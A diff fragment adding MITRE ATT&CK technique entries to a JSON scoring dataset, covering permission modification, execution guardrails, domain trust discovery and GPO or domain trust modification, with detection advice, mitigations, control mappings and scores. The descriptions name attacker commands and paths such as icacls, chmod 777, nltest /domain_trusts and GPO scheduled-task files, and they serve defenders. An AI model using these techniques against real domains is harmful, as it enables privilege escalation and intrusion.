+                "detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)",
+                "mitigations": [
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1222.002",
+                "name": "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification",
+                "url": "https://attack.mitre.org/techniques/T1222/002",
+                "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) ",
+                "detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.",
+                "mitigations": [
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.6033495823809524,
+        "adjusted_score": 0.6033495823809524,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.2523809523809524,
+            "mitigation_score": 0.34545454545454546,
+            "detection_score": 0.15
+        },
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.00096863
+    },
+    {
+        "tid": "T1222.001",
+        "name": "File and Directory Permissions Modification: Windows File and Directory Permissions Modification",
+        "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
+        "url": "https://attack.mitre.org/techniques/T1222/001",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Modification",
+            "Command: Command Execution",
+            "File: File Metadata",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1222",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.3142857142857143,
+        "adjusted_score": 0.3142857142857143,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1222.002",
+        "name": "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification",
+        "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) ",
+        "url": "https://attack.mitre.org/techniques/T1222/002",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Metadata",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1222",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.3142857142857143,
+        "adjusted_score": 0.3142857142857143,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1480",
+        "name": "Execution Guardrails",
+        "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
+        "url": "https://attack.mitre.org/techniques/T1480",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1480.001",
+                "name": "Execution Guardrails: Environmental Keying",
+                "url": "https://attack.mitre.org/techniques/T1480/001",
+                "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
+                "detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
+                "mitigations": [
+                    {
+                        "mid": "M1055",
+                        "name": "Do Not Mitigate",
+                        "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.",
+                        "url": "https://attack.mitre.org/mitigations/M1055"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1055",
+                "name": "Do Not Mitigate",
+                "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.",
+                "url": "https://attack.mitre.org/mitigations/M1055"
+            }
+        ],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {},
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1480.001",
+        "name": "Execution Guardrails: Environmental Keying",
+        "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
+        "url": "https://attack.mitre.org/techniques/T1480/001",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1480",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1055",
+                "name": "Do Not Mitigate",
+                "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.",
+                "url": "https://attack.mitre.org/mitigations/M1055"
+            }
+        ],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1482",
+        "name": "Domain Trust Discovery",
+        "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)",
+        "url": "https://attack.mitre.org/techniques/T1482",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information, such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)\n",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            }
+        ],
+        "cumulative_score": 0.48394693523809523,
+        "adjusted_score": 0.48394693523809523,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.12",
+            "4.1",
+            "4.4",
+            "11.3",
+            "11.4",
+            "12.2",
+            "12.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-8",
+            "CM-6",
+            "CM-7",
+            "RA-5",
+            "SA-17",
+            "SA-8",
+            "SC-46",
+            "SC-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.29523809523809524,
+            "mitigation_score": 0.32727272727272727,
+            "detection_score": 0.26
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.08870884
+    },
+    {
+        "tid": "T1484",
+        "name": "Domain Policy Modification",
+        "description": "Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.\n\nWith sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n\nAdversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.",
+        "url": "https://attack.mitre.org/techniques/T1484",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nConsider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)",
+        "platforms": [
+            "Azure AD",
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Creation",
+            "Active Directory: Active Directory Object Deletion",
+            "Active Directory: Active Directory Object Modification",
+            "Command: Command Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1484.001",
+                "name": "Domain Policy Modification: Group Policy Modification",
+                "url": "https://attack.mitre.org/techniques/T1484/001",
+                "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)",
+                "detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1484.002",
+                "name": "Domain Policy Modification: Domain Trust Modification",
+                "url": "https://attack.mitre.org/techniques/T1484/002",
+                "description": "Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.",
+                "detection": "Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nMonitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\", or Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain)",
+                "mitigations": [
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
